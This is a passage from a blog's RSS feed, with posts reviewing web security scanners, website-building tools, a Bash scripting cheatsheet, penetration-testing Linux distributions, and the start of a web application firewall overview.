src="https://digwalker.com/content/images/2020/05/Burp-Suite-Enterprise-Edition---PortSwigger---Google-Chrome.jpg" class="kg-image" alt="OpenSource and comunity version Security scan tools 2020"></figure><p><strong><strong>Burp Suite</strong></strong> is a Java based Web Penetration Testing framework. It has become an industry standard suite of tools used by information security professionals. <strong><strong>Burp Suite</strong></strong> helps you identify vulnerabilities and verify attack vectors that are affecting web applications. Because of its popularity and breadth as well as depth of features.</p><p>Features</p><ul><li>Easy scan set-up</li><li>Recurring scanning</li><li>Out-of-box configurations</li><li>Multi-faceted AST</li><li>Scheduled scanning</li><li>Agent-led scanning</li><li>Custom configurations</li><li>Burp Scanner</li></ul><p><strong><strong><a href="https://www.zaproxy.org/">OWASP ZAP</a></strong></strong></p><figure class="kg-card kg-image-card"><img src="https://digwalker.com/content/images/2020/05/ZAPx.jpg" class="kg-image" alt="OpenSource and comunity version Security scan tools 2020"></figure><p><strong><strong>OWASP ZAP</strong>,</strong> short for <strong><strong>Z</strong></strong>ed <strong><strong>A</strong></strong>ttack <strong><strong>P</strong></strong>roxy, is an open-source web application security scanner. It is intended to be used by both those new to application security as well as professional penetration testers.</p><p>It is one of the most active OWASP projects and has been given Flagship status.</p><p>When used as a proxy server it allows the user to manipulate all of the traffic that passes through it, including traffic using https.</p><p>It can also run in a daemon mode which is then controlled via a REST API.</p><p>Features</p><ul><li>Automatic updates and pull request analysis.</li><li>The scalability of this product is very good.</li><li>The reporting is quite intuitive, which gives you a clear indication of what kind of vulnerability you have that you can drill down on to gather more information.</li><li>The OWASP's tool is free of cost, which gives it a great advantage, especially for smaller companies to make use of the tool.</li><li>It can be used effectively for internal auditing.</li><li>The community edition updates services regularly. They add new vulnerabilities into the scanning list.</li></ul><figure class="kg-card kg-image-card"><img src="https://static.shareasale.com/image/37723/728x90.gif" class="kg-image" alt="OpenSource and comunity version Security scan tools 2020"></figure>]]></content:encoded></item><item><title><![CDATA[Web Tools to create a lightning fast website]]></title><description><![CDATA[<p>Having a website for your business might seem obvious to some, but it turns out more than 50 percent of U.S. small businesses still don't have even a basic website. To many customers, your presence on the web is their first impression of your business. It should be critical</p>]]></description><link>https://digwalker.com/web-tools/</link><guid isPermaLink="false">5ebe58363322733553ec0819</guid><dc:creator><![CDATA[qpicss]]></dc:creator><pubDate>Fri, 15 May 2020 09:17:08 GMT</pubDate><media:content url="https://digwalker.com/content/images/2020/05/Mobile-Devices-Laptop-Website---Free-vector-graphic-on-Pixabay---Google-Chrome.jpg" medium="image"/><content:encoded><![CDATA[<img src="https://digwalker.com/content/images/2020/05/Mobile-Devices-Laptop-Website---Free-vector-graphic-on-Pixabay---Google-Chrome.jpg" alt="Web Tools to create a lightning fast website"><p>Having a website for your business might seem obvious to some, but it turns out more than 50 percent of U.S. small businesses still don't have even a basic website. To many customers, your presence on the web is their first impression of your business. It should be critical to have a website that showcases who you are and what you do.</p><p>If you haven't created a website yet, some simple tools can help you bring your business online, where the customers are,  so you can keep doing what you do best:</p><h3 id="weebly"><a href="https://shareasale.com/r.cfm?b=358504&amp;u=2402307&amp;m=37723&amp;urllink=&amp;afftrack=">Weebly</a></h3><figure class="kg-card kg-image-card"><img src="https://digwalker.com/content/images/2020/05/Free-Website-Builder-Build-a-Free-Website-or-Online-Store--Weebly---Google-Chrome.jpg" class="kg-image" alt="Web Tools to create a lightning fast website"></figure><p>Weebly offers a drag-and-drop website builder with 40+ mobile-friendly themes. It includes a blog, image galleries and an online store. Next to the free plan there is Weebly Professional at $12/month, which is the cheapest ad-free plan and lets you use your own domain name.</p><h4 id="colors"><strong>Colors</strong></h4><p>Pick colors that are complementary and match the characteristics of your brand.</p><p><a href="https://pigment.shapefactory.co/">Pigment</a> - This awesome tool by shapefactory helps showcase complementary colors with a vibe that kind of looks like an early 70s carpet.</p><p><a href="https://color.adobe.com/create/color-wheel/">Adobe Color Wheel</a> - A great way to experiment with different color combinations.</p><p><a href="https://brandcolors.net/">Brand colors</a> - If you ever wanted to know what colors your favorite brand uses, this site has a fairly comprehensive list.</p><p><a href="https://coolors.co/">Coolors</a> - A fun way to generate color schemes with an image uploader that can read the colors from your image and output a color scheme.</p><p><a href="http://www.elleandcompanydesign.com/blog/color-palette">Color Palette Guide</a> - They do an excellent job of laying out this information, so if you want to learn more, check it out!</p><h4 id="font"><strong>Font</strong></h4><p>Fonts can say a lot about your brand, and like colors, it’s important that you choose fonts that pair well with each other. You can have one font for our titles or headers and another font for the text on the body of our site.</p><p><a href="https://fontpair.co/">Font Pair</a> - Extremely comprehensive list of font pairings.</p><p><strong>Logos</strong></p><p>As mentioned earlier, logos are really fun. Playing around with logo makers can easily become a new hobby. That being said, it can be difficult to get an output from a logo maker that doesn’t...look like it came from a logo maker.</p><p><strong>Here are some services that make hiring a designer easy and hassle-free:</strong></p><p><a href="https://99designs.com/">99Designs</a> - We love this service. It’s a great way to find a designer, while already specifying what exactly you need. There’s also a wide range of prices — from hiring a super professional logo designer to someone still in college who just might be the next <a href="http://www.paul-rand.com/">Paul Rand</a>.</p><p><a href="https://www.fiverr.com/">Fiverr</a> - An easy service for hiring freelancers.</p><p>If you’re set on going with a web-based logo service, here a few of the best:</p><p><a href="https://logo.shapefactory.co/">Logo by Shapefactory</a> - A bit more expensive than other services, but there’s a feeling of high design to the logos that is hard to find elsewhere.</p><p><a href="https://logojoy.com/">Logojoy</a> - Another great logo design program that’s only getting better. A good one to try with a very fun onboarding process.</p><p><a href="https://www.tailorbrands.com/">Tailor Brands</a> - Another logo building tool with an easy onboarding flow.</p><p><a href="https://www.weebly.com/app-center/logo-maker3?ref=ac-search">Logo Maker</a> - A great tool that’s in the <a href="https://www.weebly.com/app-center">Weebly App Center</a>.</p><h4 id="content"><strong>Content</strong></h4><p>Once you have your colors, fonts and logos, you’re probably going to want to do something with them. Here are a few tools that help you apply your brand identity to things like Instagram content, blog posts and more.</p><p><a href="https://spark.adobe.com/sp/">Adobe Spark</a> - Adobe’s tool that helps you make elements for social media, using your brand guidelines. It’s easy to use — and more importantly, easy to make your assets look good.</p><p><a href="https://www.canva.com/">Canva</a> - Easy-to-use tools that help make adding text to images a breeze.</p><h4 id="copywriting"><strong>Copywriting</strong></h4><p>If you’re someone who has difficulty with typos, or always needs a proofreader, there are apps that help clarify your language and make sure what you’re writing is readable and clear.</p><p><a href="https://www.grammarly.com/">Grammarly</a> - This tool is an amazing spelling and grammar checker that also tracks how well you’re doing with your accuracy. Great for writing copy — and generally just helps you write better.</p><p><a href="http://www.hemingwayapp.com/">Hemingway App</a> - This app will help turn your boring, everyday paragraphs into powerful, concise novellas about the human condition and very nature of man. Just kidding! It just helps you write clearer sentences — which is always good for copy and marketing materials.</p><figure class="kg-card kg-image-card"><img src="https://static.shareasale.com/image/47/ShareASale-468x60-A.png" class="kg-image" alt="Web Tools to create a lightning fast website"></figure>]]></content:encoded></item><item><title><![CDATA[Bash Scripting Cheatsheet]]></title><description><![CDATA[<p>Just about every geek and nerd that wants to be a hacker always wants to skip straight to the good stuff, and it’s no wonder why. There’s a certain amount of mystery, intrigue, and awe in being able to used advanced tools (such as those found on Kali</p>]]></description><link>https://digwalker.com/bash-scripting-cheatsheet/</link><guid isPermaLink="false">5ebbd62d3322733553ec0789</guid><dc:creator><![CDATA[qpicss]]></dc:creator><pubDate>Wed, 13 May 2020 13:05:13 GMT</pubDate><media:content url="https://digwalker.com/content/images/2020/05/bash-148836_960_720.png--910-720----Google-Chrome.jpg" medium="image"/><content:encoded><![CDATA[<img src="https://digwalker.com/content/images/2020/05/bash-148836_960_720.png--910-720----Google-Chrome.jpg" alt="Bash Scripting Cheatsheet"><p>Just about every geek and nerd that wants to be a hacker always wants to skip straight to the good stuff, and it’s no wonder why. There’s a certain amount of mystery, intrigue, and awe in being able to used advanced tools (such as those found on Kali Linux like Metasploit) to hack into another computing system. Hackers have been around for decades now, and are frequently present in action and thriller films, such as <em>The Matrix</em>. </p><p>But there’s one big problem. These tools work almost exclusively at the command line, or in Linux, the BASH shell.</p><p>Here is the Cheatsheet for Bash that will help you to build your skills:</p><p>Example</p><pre><code class="language-bash">#!/usr/bin/env bash

NAME="John"
echo "Hello $NAME!"
</code></pre><p>Variables</p><pre><code class="language-bash">NAME="John"
echo $NAME
echo "$NAME"
echo "${NAME}!"
</code></pre><p>String quotes</p><pre><code class="language-bash">NAME="John"
echo "Hi $NAME"  #=&gt; Hi John
echo 'Hi $NAME'  #=&gt; Hi $NAME
</code></pre><p>Shell execution</p><pre><code class="language-bash">echo "I'm in $(pwd)"
echo "I'm in `pwd`"
# Same
</code></pre><p>Conditional execution</p><pre><code class="language-bash">git commit &amp;&amp; git push
git commit || echo "Commit failed"
</code></pre><p>Functions</p><pre><code class="language-bash">get_name() {
  echo "John"
}

echo "You are $(get_name)"
</code></pre><p>Conditionals</p><pre><code class="language-bash">if [[ -z "$string" ]]; then
  echo "String is empty"
elif [[ -n "$string" ]]; then
  echo "String is not empty"
fi
</code></pre><p>Strict mode</p><pre><code class="language-bash">set -euo pipefail
IFS=$'\n\t'
</code></pre><p>Brace expansion</p><pre><code class="language-bash">echo {A,B}.js
</code></pre><p><code>{A,B}</code>Same as <code>A B{A,B}.js</code>Same as <code>A.js B.js{1..5}</code>Same as <code>1 2 3 4 5</code></p><p>Basics</p><pre><code class="language-bash">name="John"
echo ${name}
echo ${name/J/j}    #=&gt; "john" (substitution)
echo ${name:0:2}    #=&gt; "Jo" (slicing)
echo ${name::2}     #=&gt; "Jo" (slicing)
echo ${name::-1}    #=&gt; "Joh" (slicing)
echo ${name:(-1)}   #=&gt; "n" (slicing from right)
echo ${name:(-2):1} #=&gt; "h" (slicing from right)
echo ${food:-Cake}  #=&gt; $food or "Cake"
</code></pre><pre><code class="language-bash">length=2
echo ${name:0:length}  #=&gt; "Jo"
</code></pre><pre><code class="language-bash">STR="/path/to/foo.cpp"
echo ${STR%.cpp}    # /path/to/foo
echo ${STR%.cpp}.o  # /path/to/foo.o

echo ${STR##*.}     # cpp (extension)
echo ${STR##*/}     # foo.cpp (basepath)

echo ${STR#*/}      # path/to/foo.cpp
echo ${STR##*/}     # foo.cpp

echo ${STR/foo/bar} # /path/to/bar.cpp
</code></pre><pre><code class="language-bash">STR="Hello world"
echo ${STR:6:5}   # "world"
echo ${STR:-5:5}  # "world"
</code></pre><pre><code class="language-bash">SRC="/path/to/foo.cpp"
BASE=${SRC##*/}   #=&gt; "foo.cpp" (basepath)
DIR=${SRC%$BASE}  #=&gt; "/path/to/" (dirpath)
</code></pre><p>Substitution ${FOO%suffix}Remove suffix${FOO#prefix}Remove prefix${FOO%%suffix}Remove long suffix${FOO##prefix}Remove long prefix${FOO/from/to}Replace first match${FOO//from/to}Replace all${FOO/%from/to}Replace suffix${FOO/#from/to}Replace prefix</p><p>Comments</p><pre><code class="language-bash"># Single line comment
</code></pre><pre><code class="language-bash">: '
This is a
multi line
comment
'
</code></pre><p>Substrings<code>${FOO:0:3}</code>Substring <em>(position, length)</em><code>${FOO:-3:3}</code>Substring from the right</p><p>Length<code>${#FOO}</code>Length of <code>$FOO</code></p><p>Manipulation</p><pre><code class="language-bash">STR="HELLO WORLD!"
echo ${STR,}   #=&gt; "hELLO WORLD!" (lowercase 1st letter)
echo ${STR,,}  #=&gt; "hello world!" (all lowercase)

STR="hello world!"
echo ${STR^}   #=&gt; "Hello world!" (uppercase 1st letter)
echo ${STR^^}  #=&gt; "HELLO WORLD!" (all uppercase)
</code></pre><p>Default values<code>${FOO:-val}$FOO</code>, or <code>val</code> if not set<code>${FOO:=val}</code>Set <code>$FOO</code> to <code>val</code> if not set<code>${FOO:+val}val</code> if <code>$FOO</code> is set<code>${FOO:?message}</code>Show error message and exit if <code>$FOO</code> is not set</p><p>Basic for loop</p><pre><code class="language-bash">for i in /etc/rc.*; do
  echo $i
done
</code></pre><p>C-like for loop</p><pre><code class="language-bash">for ((i = 0 ; i &lt; 100 ; i++)); do
  echo $i
done
</code></pre><p>Ranges</p><pre><code class="language-bash">for i in {1..5}; do
    echo "Welcome $i"
done
</code></pre><p>With step size</p><pre><code class="language-bash">for i in {5..50..5}; do
    echo "Welcome $i"
done
</code></pre><p>Reading lines</p><pre><code class="language-bash">cat file.txt | while read line; do
  echo $line
done
</code></pre><p>Forever</p><pre><code class="language-bash">while true; do
  ···
done
</code></pre><p>Defining functions</p><pre><code class="language-bash">myfunc() {
    echo "hello $1"
}
</code></pre><pre><code class="language-bash"># Same as above (alternate syntax)
function myfunc() {
    echo "hello $1"
}
</code></pre><pre><code class="language-bash">myfunc "John"
</code></pre><p>Returning values</p><pre><code class="language-bash">myfunc() {
    local myresult='some value'
    echo $myresult
}
</code></pre><pre><code class="language-bash">result="$(myfunc)"
</code></pre><p>Raising errors</p><pre><code class="language-bash">myfunc() {
  return 1
}
</code></pre><pre><code class="language-bash">if myfunc; then
  echo "success"
else
  echo "failure"
fi
</code></pre><p>Arguments $#Number of arguments$*All arguments$@All arguments, starting from first$1First argument$_Last argument of the previous command</p><p>Conditionals</p><p>Conditions</p><p>Note that <code>[[</code> is actually a command/program that returns either <code>0</code> (true) or <code>1</code> (false). Any program that obeys the same logic (like all base utils, such as <code>grep(1)</code> or <code>ping(1)</code>) can be used as condition, see examples. <code>[[ -z STRING ]]</code>Empty string<code>[[ -n STRING ]]</code>Not empty string<code>[[ STRING == STRING ]]</code>Equal<code>[[ STRING != STRING ]]</code>Not Equal<code>[[ NUM -eq NUM ]]</code>Equal<code>[[ NUM -ne NUM ]]</code>Not equal<code>[[ NUM -lt NUM ]]</code>Less than<code>[[ NUM -le NUM ]]</code>Less than or equal<code>[[ NUM -gt NUM ]]</code>Greater than<code>[[ NUM -ge NUM ]]</code>Greater than or equal<code>[[ STRING =~ STRING ]]</code>Regexp<code>(( NUM &lt; NUM ))</code>Numeric conditions <code>[[ -o noclobber ]]</code>If OPTIONNAME is enabled<code>[[ ! EXPR ]]</code>Not<code>[[ X ]] &amp;&amp; [[ Y ]]</code>And<code>[[ X ]] || [[ Y ]]</code>Or</p><p>File conditions [[ -e FILE ]]Exists[[ -r FILE ]]Readable[[ -h FILE ]]Symlink[[ -d FILE ]]Directory[[ -w FILE ]]Writable[[ -s FILE ]]Size is &gt; 0 bytes[[ -f FILE ]]File[[ -x FILE ]]Executable[[ FILE1 -nt FILE2 ]]1 is more recent than 2[[ FILE1 -ot FILE2 ]]2 is more recent than 1[[ FILE1 -ef FILE2 ]]Same files</p><p>Example</p><pre><code class="language-bash"># String
if [[ -z "$string" ]]; then
  echo "String is empty"
elif [[ -n "$string" ]]; then
  echo "String is not empty"
fi
</code></pre><pre><code class="language-bash"># Combinations
if [[ X ]] &amp;&amp; [[ Y ]]; then
  ...
fi
</code></pre><pre><code class="language-bash"># Equal
if [[ "$A" == "$B" ]]
</code></pre><pre><code class="language-bash"># Regex
if [[ "A" =~ . ]]
</code></pre><pre><code class="language-bash">if (( $a &lt; $b )); then
   echo "$a is smaller than $b"
fi
</code></pre><pre><code class="language-bash">if [[ -e "file.txt" ]]; then
  echo "file exists"
fi
</code></pre><p>Defining arrays</p><pre><code class="language-bash">Fruits=('Apple' 'Banana' 'Orange')
</code></pre><pre><code class="language-bash">Fruits[0]="Apple"
Fruits[1]="Banana"
Fruits[2]="Orange"
</code></pre><p>Working with arrays</p><pre><code class="language-bash">echo ${Fruits[0]}           # Element #0
echo ${Fruits[@]}           # All elements, space-separated
echo ${#Fruits[@]}          # Number of elements
echo ${#Fruits}             # String length of the 1st element
echo ${#Fruits[3]}          # String length of the Nth element
echo ${Fruits[@]:3:2}       # Range (from position 3, length 2)
</code></pre><p>Operations</p><pre><code class="language-bash">Fruits=("${Fruits[@]}" "Watermelon")    # Push
Fruits+=('Watermelon')                  # Also Push
Fruits=( ${Fruits[@]/Ap*/} )            # Remove by regex match
unset Fruits[2]                         # Remove one item
Fruits=("${Fruits[@]}")                 # Duplicate
Fruits=("${Fruits[@]}" "${Veggies[@]}") # Concatenate
lines=(`cat "logfile"`)                 # Read from file
</code></pre><p>Iteration</p><pre><code class="language-bash">for i in "${arrayName[@]}"; do
  echo $i
done
</code></pre><p>Defining</p><pre><code class="language-bash">declare -A sounds
</code></pre><pre><code class="language-bash">sounds[dog]="bark"
sounds[cow]="moo"
sounds[bird]="tweet"
sounds[wolf]="howl"
</code></pre><p>Working with dictionaries</p><pre><code class="language-bash">echo ${sounds[dog]} # Dog's sound
echo ${sounds[@]}   # All values
echo ${!sounds[@]}  # All keys
echo ${#sounds[@]}  # Number of elements
unset sounds[dog]   # Delete dog
</code></pre><p>Iteration</p><p>Iterate over values</p><pre><code class="language-bash">for val in "${sounds[@]}"; do
  echo $val
done
</code></pre><p>Iterate over keys</p><pre><code class="language-bash">for key in "${!sounds[@]}"; do
  echo $key
done
</code></pre><p>Options</p><pre><code class="language-bash">set -o noclobber  # Avoid overlay files (echo "hi" &gt; foo)
set -o errexit    # Used to exit upon error, avoiding cascading errors
set -o pipefail   # Unveils hidden failures
set -o nounset    # Exposes unset variables
</code></pre><p>Glob options</p><pre><code class="language-bash">shopt -s nullglob    # Non-matching globs are removed  ('*.foo' =&gt; '')
shopt -s failglob    # Non-matching globs throw errors
shopt -s nocaseglob  # Case insensitive globs
shopt -s dotglob     # Wildcards match dotfiles ("*.sh" =&gt; ".foo.sh")
shopt -s globstar    # Allow ** for recursive matches ('lib/**/*.rb' =&gt; 'lib/a/b/c.rb')
</code></pre><p>Commands<code>history</code>Show history<code>shopt -s histverify</code>Don’t execute expanded result immediately</p><p>Expansions<code>!$</code>Expand last parameter of most recent command<code>!*</code>Expand all parameters of most recent command<code>!-n</code>Expand <code>n</code>th most recent command<code>!n</code>Expand <code>n</code>th command in history<code>!&lt;command&gt;</code>Expand most recent invocation of command <code>&lt;command&gt;</code></p><p>Operations<code>!!</code>Execute last command again<code>!!:s/&lt;FROM&gt;/&lt;TO&gt;/</code>Replace first occurrence of <code>&lt;FROM&gt;</code> to <code>&lt;TO&gt;</code> in most recent command<code>!!:gs/&lt;FROM&gt;/&lt;TO&gt;/</code>Replace all occurrences of <code>&lt;FROM&gt;</code> to <code>&lt;TO&gt;</code> in most recent command<code>!$:t</code>Expand only basename from last parameter of most recent command<code>!$:h</code>Expand only directory from last parameter of most recent command</p><p>!! and !$ can be replaced with any valid expansion.</p><p>Slices<code>!!:n</code>Expand only <code>n</code>th token from most recent command (command is <code>0</code>; first argument is <code>1</code>)<code>!^</code>Expand first argument from most recent command<code>!$</code>Expand last token from most recent command<code>!!:n-m</code>Expand range of tokens from most recent command<code>!!:n-$</code>Expand <code>n</code>th token to last from most recent command</p><p>!! can be replaced with any valid expansion i.e. !cat, !-2, !42, etc.</p><p>Numeric calculations</p><pre><code class="language-bash">$((a + 200))      # Add 200 to $a
</code></pre><pre><code class="language-bash">$((RANDOM%=200))  # Random number 0..200
</code></pre><p>Subshells</p><pre><code class="language-bash">(cd somedir; echo "I'm now in $PWD")
pwd # still in first directory
</code></pre><p>Redirection</p><pre><code class="language-bash">python hello.py &gt; output.txt   # stdout to (file)
python hello.py &gt;&gt; output.txt  # stdout to (file), append
python hello.py 2&gt; error.log   # stderr to (file)
python hello.py 2&gt;&amp;1           # stderr to stdout
python hello.py 2&gt;/dev/null    # stderr to (null)
python hello.py &amp;&gt;/dev/null    # stdout and stderr to (null)
</code></pre><pre><code class="language-bash">python hello.py &lt; foo.txt      # feed foo.txt to stdin for python
</code></pre><p>Inspecting commands</p><pre><code class="language-bash">command -V cd
#=&gt; "cd is a function/alias/whatever"
</code></pre><p>Trap errors</p><pre><code class="language-bash">trap 'echo Error at about $LINENO' ERR
</code></pre><p>or</p><pre><code class="language-bash">traperr() {
  echo "ERROR: ${BASH_SOURCE[1]} at about ${BASH_LINENO[0]}"
}

set -o errtrace
trap traperr ERR
</code></pre><p>Case/switch</p><pre><code class="language-bash">case "$1" in
  start | up)
    vagrant up
    ;;

  *)
    echo "Usage: $0 {start|stop|ssh}"
    ;;
esac
</code></pre><p>Source relative</p><pre><code class="language-bash">source "${0%/*}/../share/foo.sh"
</code></pre><p>printf</p><pre><code class="language-bash">printf "Hello %s, I'm %s" Sven Olga
#=&gt; "Hello Sven, I'm Olga

printf "1 + 1 = %d" 2
#=&gt; "1 + 1 = 2"

printf "This is how you print a float: %f" 2
#=&gt; "This is how you print a float: 2.000000"
</code></pre><p>Directory of script</p><pre><code class="language-bash">DIR="${0%/*}"
</code></pre><p>Getting options</p><pre><code class="language-bash">while [[ "$1" =~ ^- &amp;&amp; ! "$1" == "--" ]]; do case $1 in
  -V | --version )
    echo $version
    exit
    ;;
  -s | --string )
    shift; string=$1
    ;;
  -f | --flag )
    flag=1
    ;;
esac; shift; done
if [[ "$1" == '--' ]]; then shift; fi
</code></pre><p>Heredoc</p><pre><code class="language-sh">cat &lt;&lt;END
hello world
END
</code></pre><p>Reading input</p><pre><code class="language-bash">echo -n "Proceed? [y/n]: "
read ans
echo $ans
</code></pre><pre><code class="language-bash">read -n 1 ans    # Just one character
</code></pre><p>Special variables$?Exit status of last task$!PID of last background task$$PID of shell$0Filename of the shell script</p><p>Go to previous directory</p><pre><code class="language-bash">pwd # /home/user/foo
cd bar/
pwd # /home/user/foo/bar
cd -
pwd # /home/user/foo
</code></pre><p>Check for command’s result</p><pre><code class="language-bash">if ping -c 1 google.com; then
  echo "It appears you have a working internet connection"
fi
</code></pre><p>Grep check</p><pre><code class="language-bash">if grep -q 'foo' ~/.bash_history; then
  echo "You appear to have typed 'foo' in the past"
fi
</code></pre>]]></content:encoded></item><item><title><![CDATA[Best Linux distros to Security and Penetration Testing in 2020]]></title><description><![CDATA[<p>Since you are reading this, I’ll assume you are are looking to improve your security posture. If so you will want to adopt the habit of verifying the signature of software you download.</p><p>Here’s a list of various Linux distributions focusing on security. These distros provide multiple tools</p>]]></description><link>https://digwalker.com/best-linux-distros-to-security-and-penetration-testing/</link><guid isPermaLink="false">5ebabed33322733553ec070f</guid><dc:creator><![CDATA[qpicss]]></dc:creator><pubDate>Tue, 12 May 2020 16:03:07 GMT</pubDate><media:content url="https://digwalker.com/content/images/2020/05/Picking-a-Linux-Distro-Part-2--Debian-and-Fedora---Linode-Cube---Medium---Google-Chrome.jpg" medium="image"/><content:encoded><![CDATA[<img src="https://digwalker.com/content/images/2020/05/Picking-a-Linux-Distro-Part-2--Debian-and-Fedora---Linode-Cube---Medium---Google-Chrome.jpg" alt="Best Linux distros to Security and Penetration Testing in 2020"><p>Since you are reading this, I’ll assume you are are looking to improve your security posture. If so you will want to adopt the habit of verifying the signature of software you download.</p><p>Here’s a list of various Linux distributions focusing on security. These distros provide multiple tools that are needed for assessing networking security and other similar tasks. The list is in no particular order.</p><h2 id="archstrike">Archstrike</h2><figure class="kg-card kg-image-card"><img src="https://digwalker.com/content/images/2020/05/-archstrike---Twitter-Search--Twitter---Google-Chrome.jpg" class="kg-image" alt="Best Linux distros to Security and Penetration Testing in 2020"></figure><p>ArchStrike (previously known as ArchAssault) is a project based on Arch Linux for penetration testers and security professionals.</p><p>It comes with all the best parts of Arch Linux amd additional tools for penetration testing and cyber security. ArchStrike includes thousands of tools and applications, all categorized into modular package groups.</p><p>There are around <a href="https://archstrike.org/packages" rel="nofollow noopener">5000 packages</a> available for almost everything you need in various categories, and some of them are:</p><ul><li>Exploit</li><li>Malware</li><li>Spoofing/Sniffing</li><li>DDoS</li><li>Social Engineering</li><li>Enumeration</li><li>Networking</li><li>Forensics</li><li>Brute Force</li></ul><p>ArchStrike is straightforward and lightweight, so give a try and see if that works for you.</p><h2 id="blackarch-linux">BlackArch Linux</h2><figure class="kg-card kg-image-card"><img src="https://digwalker.com/content/images/2020/05/fluxbox_1000.jpg--1000-563----Google-Chrome.jpg" class="kg-image" alt="Best Linux distros to Security and Penetration Testing in 2020"></figure><p>BlackArch is a penetration testing and security research distro built on top of Arch Linux.</p><p>BlackArch can be installed on top of Arch Linux or from ISO. Documentation is available in English, French, Turkish, and Brazillian language.</p><p>BlackArch has its own repository containing thousands of tools organized in various groups. And the list is growing over time.</p><p>If you are already an Arch Linux user, you can set up the BlackArch tools collection on top of it.</p><h2 id="kali-linux">Kali Linux</h2><figure class="kg-card kg-image-card"><img src="https://digwalker.com/content/images/2020/05/kali-linux-sensorstechforum.png--1024-768----Google-Chrome.jpg" class="kg-image" alt="Best Linux distros to Security and Penetration Testing in 2020"></figure><p>Kali Linux is the most widely known Linux distro for ethical hacking and penetration testing. Kali Linux is developed by Offensive Security and previously by <a href="http://www.backtrack-linux.org/" rel="noopener noreferrer">BackTrack</a>.</p><p>Kali Linux is based on Debian. It comes with a large amount of penetration testing tools from various fields of security and forensics.</p><p>Kali Linux is available in 64 bit, 32 bit, and virtual images to download. Lately, it was made available in AWS and Azure cloud.</p><p>Having more than <a href="http://tools.kali.org/tools-listing" rel="nofollow noopener">350 tools</a> in the following category and extensive documentation makes Kali excellent.</p><ul><li>Information Gathering</li><li>Vulnerability Analysis</li><li>Wireless, Password, Hardware Attacks</li><li>Web Applications</li><li>Exploitation, Forensics. Stress Testing, Reporting</li><li>Sniffing, Spoofing,</li><li>Reverse Engineering</li></ul><p>Kali is an open-source maintained by offensive security.</p><h3 id="samurai-web-testing-framework"><a href="https://sourceforge.net/projects/samurai/" rel="noreferrer noopener">Samurai Web Testing Framework</a></h3><figure class="kg-card kg-image-card"><img src="https://digwalker.com/content/images/2020/05/Samurai-Web-Testing-Framework-3.0---LiveCD-Web-Pen-testing-Environment---Google-Chrome.jpg" class="kg-image" alt="Best Linux distros to Security and Penetration Testing in 2020"></figure><p>Samurai Web Testing Framework is developed with the sole purpose of penetration testing on the web. Another aspect of this distro is that it comes as a virtual machine, supported by Virtualbox and VMware.</p><p>Samurai Web Testing Framework is based on Ubuntu and contains the best free and open-source tools that focus on testing and attacking websites.</p><p>It also includes a pre-configured wiki set up to store information during your penetration tests.</p><p>The virtual machine is pre-configured with many open source security tools, including the following.</p><ul><li>Fierce domain scanner</li><li>Maltego</li><li>WebScarab</li><li>Ratproxy</li><li>W3af</li><li>Burp</li><li>Beef</li><li>AJAXShell</li></ul><h2 id="bugtraq"><a href="http://bugtraq-team.com/" rel="noopener noreferrer">Bugtraq</a></h2><figure class="kg-card kg-image-card"><img src="https://digwalker.com/content/images/2020/05/-3--Bugtraq-2-BlackWidow-Trojan-BlackNix-infecting-linux-with-default-wine---YouTube---Google-Chrome.jpg" class="kg-image" alt="Best Linux distros to Security and Penetration Testing in 2020"></figure><p>Bugtraq is a Linux distro with a huge range of penetration, forensic and laboratory tools.</p><p>Bugtraq is available with the XFCE, GNOME and KDE desktop environments, in Ubuntu, Debian and OpenSUSE versions. It’s also available in 11 different languages.</p><p>Bugtraq packs in a huge arsenal of penetration testing tools: mobile forensics, malware testing laboratories and tools specifically designed by the Bugtraq community.</p><p><a href="http://bugtraq-team.com/" rel="nofollow noopener">Bugtraq</a> is an advanced, robust pen-testing platform available in 11 languages. It comes with more than 500 security tools and ready to download in either 32bit or 64bit.</p><p>Bugtraq is based on GNU/Linux, so you get an excellent menu and user-interface and the following customization.</p><ul><li>Syslinux boot entry</li><li>Pressed file</li><li>Services</li><li>Kernel</li></ul><p>Some of the following essential tools you will get with Bugtraq:</p><ul><li>Nessus</li><li>Burt Suite</li><li><a href="https://geekflare.com/nikto-webserver-scanner/">Nikto</a></li><li>Evil-grade</li><li>Hydra</li><li>Wireshark</li><li>Beef</li></ul><p>Want to get this installed on your <strong>Mobile</strong>? Good news, you can do that on Android.</p>]]></content:encoded></item><item><title><![CDATA[Top 3 Web Application Firewall In 2020]]></title><description><![CDATA[<p>Enterprises need to keep pace with latest security technological advancements to protect their online web data from malicious attacks and threats. Online businesses need to monitor their websites constantly and mobile infrastructure to create a strong defense against malware, DDoS, phishing, data exfiltration among other advanced attacks.</p><p>Attackers devise mechanisms</p>]]></description><link>https://digwalker.com/top-5-web-application-firewall-in-2020/</link><guid isPermaLink="false">5eb999443322733553ec0691</guid><dc:creator><![CDATA[qpicss]]></dc:creator><pubDate>Mon, 11 May 2020 18:55:32 GMT</pubDate><media:content url="https://digwalker.com/content/images/2020/05/waf---Google-Search---Google-Chrome.jpg" medium="image"/><content:encoded><![CDATA[<img src="https://digwalker.com/content/images/2020/05/waf---Google-Search---Google-Chrome.jpg" alt="Top 3 Web Application Firewall In 2020"><p>Enterprises need to keep pace with latest security technological advancements to protect their online web data from malicious attacks and threats. Online businesses need to monitor their websites constantly and mobile infrastructure to create a strong defense against malware, DDoS, phishing, data exfiltration among other advanced attacks.</p><p>Attackers devise mechanisms such as designing and inserting codes or overwriting codes to interfere with your website, altering web values and queries, and automating data extraction from the web among other advanced attacks. If attackers succeed with their malicious plans, it can cost the business billions of dollars in operational costs or bring about irrevocable damage to the enterprise.</p><p>So, how then can a company ensure that it is aware of attacks and has protection against them? The solution is in the acquisition of web application firewalls.</p><p>According to <a href="https://en.wikipedia.org/wiki/Web_application_firewall">wikipedia</a> A <strong>web application firewall</strong> (or WAF) filters, monitors, and blocks <a href="https://en.wikipedia.org/wiki/HTTP">HTTP</a><a href="https://en.wikipedia.org/wiki/Network_traffic">traffic</a> to and from a <a href="https://en.wikipedia.org/wiki/Web_application">web application</a>. A WAF is differentiated from a regular <a href="https://en.wikipedia.org/wiki/Firewall_(computing)">firewall</a> in that a WAF is able to filter the content of specific web applications while regular firewalls serve as a safety gate between servers. By inspecting HTTP traffic, it can prevent attacks stemming from web application security flaws, such as <a href="https://en.wikipedia.org/wiki/SQL_injection">SQL injection</a>, <a href="https://en.wikipedia.org/wiki/Cross-site_scripting">cross-site scripting</a> (XSS), file inclusion, and security misconfigurations.</p><h2 id="cloudflare-waf"><a href="https://www.cloudflare.com/waf/" rel="noopener">Cloudflare WAF</a></h2><figure class="kg-card 